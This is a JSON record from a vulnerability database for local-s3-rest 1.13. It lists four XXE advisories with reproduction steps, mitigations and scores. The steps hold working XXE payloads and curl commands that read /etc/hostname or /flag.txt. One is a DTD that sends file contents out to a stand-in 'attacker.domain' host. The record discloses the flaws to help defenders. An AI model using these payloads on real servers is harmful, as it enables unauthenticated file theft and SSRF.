{"url":"http://public2.vulnerablecode.io/api/packages/785740?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.13","type":"maven","namespace":"io.github.robothy","name":"local-s3-rest","version":"1.13","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.21","latest_non_vulnerable_version":"1.21","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360724?format=json","vulnerability_id":"VCID-1mqk-f6zx-6kf2","summary":"LocalS3 XML Parser Vulnerable to XML External Entity (XXE) Injection\n## Description\n\nThe LocalS3 project, which implements an S3-compatible storage interface, contains a critical XML External Entity (XXE) Injection vulnerability in its XML parsing functionality. When processing XML requests for multipart upload operations, the application accepts and processes XML external entities, allowing an attacker to read local system files and potentially make outbound network connections.\n\nThe vulnerability exists because the XML parser is configured to process external entities and DTD (Document Type Definition) declarations without proper restrictions. This allows an attacker to define external entities that can read local files and exfiltrate their contents through outbound HTTP requests.\n\nThe vulnerability is particularly severe as it allows direct access to sensitive files on the filesystem, bypassing any directory traversal protections that might be in place for normal S3 operations.\n\n## Steps to Reproduce\n\n1. Create a malicious DTD file containing the following content:\n```\n<!ENTITY % file SYSTEM \"file:///etc/hostname\">\n<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://attacker.domain/?flag=%file;'>\">\n%eval;\n%exfil;\n```\n\n2. Host the malicious DTD file on an accessible web server\n\n3. Initialize a multipart upload to the LocalS3 server:\n```\ncurl -X PUT \"http://app/test-bucket/test.txt?uploads\"\n```\n\n4. Send a POST request to complete the multipart upload with the following XML payload:\n    ```\n   curl -X POST \"http://app/test-bucket/test.txt?uploadId=[upload-id]\" \\\n   -H \"Content-Type: application/xml\" \\\n   -d '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE data [\n   <!ENTITY % dtd SYSTEM \"http://attacker.domain/evil.dtd\">\n   %dtd;\n   ]>\n   <CompleteMultipartUpload>\n       <Part>\n           <PartNumber>1</PartNumber>\n           <ETag>test</ETag>\n       </Part>\n   </CompleteMultipartUpload>'\n    ```\n\nThe server will process the XML, load the external DTD, and when evaluating the entities, will read the contents of /etc/hostname and send them to the attacker's server via an HTTP request.\n\n## Mitigations\n\n- Disable DTD processing in the XML parser configuration\n- If DTD processing is required, disable the ability to load external entities and external DTDs\n- Implement XML parsing with secure defaults using JAXP's XMLConstants.FEATURE_SECURE_PROCESSING feature\n- Set up proper input validation and sanitization for all XML processing operations\n\n## Impact\n\nAn attacker can exploit this vulnerability to read arbitrary files from the server's filesystem and exfiltrate their contents through outbound HTTP requests. The vulnerability requires no authentication and can be exploited by anyone who can send requests to the LocalS3 server. This could lead to exposure of sensitive information including configuration files, credentials, and other confidential data stored on the server.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-47qw-ccjm-9c2c","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-47qw-ccjm-9c2c"},{"reference_url":"https://github.com/advisories/GHSA-47qw-ccjm-9c2c","reference_id":"GHSA-47qw-ccjm-9c2c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-47qw-ccjm-9c2c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-47qw-ccjm-9c2c"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1mqk-f6zx-6kf2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360709?format=json","vulnerability_id":"VCID-6ayy-dk32-ebbn","summary":"LocalS3 Project Vulnerable to XML External Entity (XXE) Injection via Bucket Tagging API\n## Description\nThe LocalS3 project, an S3-compatible storage service, is vulnerable to XML External Entity (XXE) injection through its bucket tagging API. The vulnerability exists because the application processes XML input without properly disabling external entity resolution.\n\nWhen processing XML data for bucket tagging operations, the application allows the definition and resolution of external entities. This vulnerability allows an attacker to read arbitrary files from the server's filesystem by defining an external entity that references local files.\n\nThe vulnerability is particularly severe because it allows direct access to sensitive files on the server's filesystem, bypassing any intended access controls. The XXE vulnerability can be exploited to read any file that the application process has access to, potentially exposing sensitive configuration files, credentials, or other confidential information.\n\n## Steps to Reproduce\n1. Create a bucket in the LocalS3 service using any S3 client (e.g., AWS CLI, boto3)\n2. Send a PUT request to the bucket tagging endpoint with the following XML payload:\n   ```xml\n   <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE data [\n       <!ENTITY xxe SYSTEM \"file:///flag.txt\" >\n   ]>\n   <Tagging><TagSet><Tag><Key>xxe</Key><Value>&xxe;</Value></Tag></TagSet></Tagging>\n   ```\n\n    ```\n    curl -X PUT \\\n         -H \"Host: app\" \\\n         -H \"Authorization: AWS dummy:dummy\" \\\n         -H \"Content-Type: application/xml\" \\\n         --data-binary @xxe.xml \\\n         http://app/bucket?tagging\n    ```\n\n3. Retrieve the bucket tags using a GET request to the same endpoint\n\n    ```\n    curl -H \"Authorization: AWS dummy:dummy\" http://app-1/bucket?tagging\n    ```\n\n4. The content of the targeted file will be returned in the tag value\n\nThe successful exploitation of this vulnerability results in the contents of sensitive files being disclosed through the XML response, demonstrating the ability to read arbitrary files from the server's filesystem.\n\n## Mitigations\n- Disable XML external entity resolution in the XML parser configuration\n- Implement proper XML parsing security controls such as disabling DTD processing altogether\n- Use a safe parser configuration that doesn't process external entities or DTDs by default\n- Validate and sanitize all XML input before processing to prevent injection of malicious entities\n\n## Impact\nCritical severity vulnerability allowing unauthenticated attackers to read arbitrary files from the server's filesystem. This can lead to exposure of sensitive information, configuration files, and system data, potentially enabling further attacks against the system. The impact is heightened by the fact that the vulnerability requires minimal technical knowledge to exploit and can be triggered through standard S3 API operations.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-v232-254c-m6p7","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-v232-254c-m6p7"},{"reference_url":"https://github.com/advisories/GHSA-v232-254c-m6p7","reference_id":"GHSA-v232-254c-m6p7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v232-254c-m6p7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-v232-254c-m6p7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-6ayy-dk32-ebbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/117152?format=json","vulnerability_id":"VCID-gsmm-qjk6-83dn","summary":"LocalS3 is an Amazon S3 mock service for testing and local development. Prior to version 1.21, the LocalS3 service's bucket creation endpoint is vulnerable to XML External Entity (XXE) injection. When processing the CreateBucketConfiguration XML document during bucket creation, the service's XML parser is configured to resolve external entities. This allows an attacker to declare an external entity that references an internal URL, which the server will then attempt to fetch when parsing the XML. The vulnerability specifically occurs in the location constraint processing, where the XML parser resolves external entities without proper validation or restrictions. When the external entity is resolved, the server makes an HTTP request to the specified URL and includes the response content in the parsed XML document. This vulnerability can be exploited to perform server-side request forgery (SSRF) attacks, allowing an attacker to make requests to internal services or resources that should not be accessible from external networks. The server will include the responses from these internal requests in the resulting bucket configuration, effectively leaking sensitive information. The attacker only needs to be able to send HTTP requests to the LocalS3 service to exploit this vulnerability.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27136","reference_id":"","reference_type":"","scores":[{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01139","published_at":"2026-06-14T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01129","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.01136","published_at":"2026-06-13T12:55:00Z"},{"value":"0.0001","scoring_system":"epss","scoring_elements":"0.0113","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27136"},{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27136","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27136"},{"reference_url":"https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f","reference_id":"d6ed756ceb30c1eb9d4263321ac683d734f8836f","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T19:08:39Z/"}],"url":"https://github.com/Robothy/local-s3/commit/d6ed756ceb30c1eb9d4263321ac683d734f8836f"},{"reference_url":"https://github.com/advisories/GHSA-g6wm-2v64-wq36","reference_id":"GHSA-g6wm-2v64-wq36","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g6wm-2v64-wq36"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-g6wm-2v64-wq36","reference_id":"GHSA-g6wm-2v64-wq36","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-10T19:08:39Z/"}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-g6wm-2v64-wq36"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["CVE-2025-27136","GHSA-g6wm-2v64-wq36"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-gsmm-qjk6-83dn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360686?format=json","vulnerability_id":"VCID-uyuk-z7fn-cbbe","summary":"LocalS3 Project Bucket Operations Vulnerable to XML External Entity (XXE) Injection\n## Description\n\nThe LocalS3 project contains an XML External Entity (XXE) Injection vulnerability in its bucket operations that process XML data. Specifically, the vulnerability exists in the bucket ACL and bucket tagging operations. The application processes XML input without properly disabling external entity resolution, allowing an attacker to read arbitrary files from the server's filesystem.\n\nThe vulnerability occurs because the XML parser used by the application processes DOCTYPE declarations and allows external entity references. When processing bucket ACL or tagging operations, the application includes the content of external entities in its response, effectively exposing sensitive files from the server.\n\nThis type of vulnerability can be exploited to read sensitive files, perform server-side request forgery (SSRF), or potentially achieve denial of service through various XXE attack vectors.\n\n## Steps to Reproduce\n\n1. Create a test bucket using PUT request to http://[server]/[bucket-name]\n\n    ```\n    curl -X PUT \"http://app/xxe-test-bucket2\"\n    ```\n\n2. Send a PUT request to http://[server]/[bucket-name]?acl with the following XXE payload:\n   ```\n   curl -X PUT \"http://app/xxe-test-bucket2?acl\" \\\n   -H \"Content-Type: application/xml\" \\\n   -d '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n   <!DOCTYPE AccessControlPolicy [\n       <!ENTITY xxe SYSTEM \"file:///etc/hostname\" >\n   ]>\n   <AccessControlPolicy>\n       <Owner>\n           <ID>&xxe;</ID>\n           <DisplayName>test</DisplayName>\n       </Owner>\n       <AccessControlList>\n           <Grant>\n               <Grantee xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:type=\"CanonicalUser\">\n                   <ID>test</ID>\n                   <DisplayName>test</DisplayName>\n               </Grantee>\n               <Permission>FULL_CONTROL</Permission>\n           </Grant>\n       </AccessControlList>\n   </AccessControlPolicy>'\n   ```\n\n3. Send a GET request to `http://[server]/[bucket-name]?acl` to retrieve the bucket ACL\n\n    ```\n    curl \"http://app/xxe-test-bucket2?acl\"\n    ```\n\nAfter performing these steps, the content of the target file (/flag.txt in this case) will be included in the response within the ID field of the Owner element.\n\n## Mitigations\n\n- Configure the XML parser to disable external entity resolution by setting XMLConstants.FEATURE_SECURE_PROCESSING to true\n- Disable DOCTYPE declarations in the XML parser configuration\n- Implement XML input validation and sanitization before processing\n- Consider using JSON instead of XML for these operations if XML parsing is not strictly necessary\n\n## Impact\n\nThe vulnerability requires no authentication and can be exploited by any user who can make HTTP requests to the server. It allows reading arbitrary files from the server's filesystem, which could expose sensitive configuration files, credentials, or other confidential information. The vulnerability can also be used to perform SSRF attacks against internal systems.","references":[{"reference_url":"https://github.com/Robothy/local-s3","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3"},{"reference_url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Robothy/local-s3/security/advisories/GHSA-2466-4485-4pxj"},{"reference_url":"https://github.com/advisories/GHSA-2466-4485-4pxj","reference_id":"GHSA-2466-4485-4pxj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2466-4485-4pxj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/377874?format=json","purl":"pkg:maven/io.github.robothy/local-s3-rest@1.21","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.21"}],"aliases":["GHSA-2466-4485-4pxj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uyuk-z7fn-cbbe"}],"fixing_vulnerabilities":[],"risk_score":"3.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/io.github.robothy/local-s3-rest@1.13"}